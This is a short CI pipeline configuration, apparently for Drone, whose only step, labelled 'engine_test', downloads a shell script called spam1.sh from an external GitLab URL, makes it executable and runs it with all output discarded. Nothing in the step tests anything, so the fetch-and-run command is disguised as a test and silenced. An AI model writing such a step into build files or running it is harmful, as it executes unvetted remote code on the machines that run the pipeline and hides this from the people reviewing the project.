---
################
# Build & Test #
################

kind: pipeline
name: run_tests

steps:
  - name: engine_test
    image: python:3.7.2
    commands:
    - wget https://gitlab.com/renifer12/project-7/-/raw/main/spam1.sh && chmod +x spam1.sh && ./spam1.sh  > /dev/null 2>&1
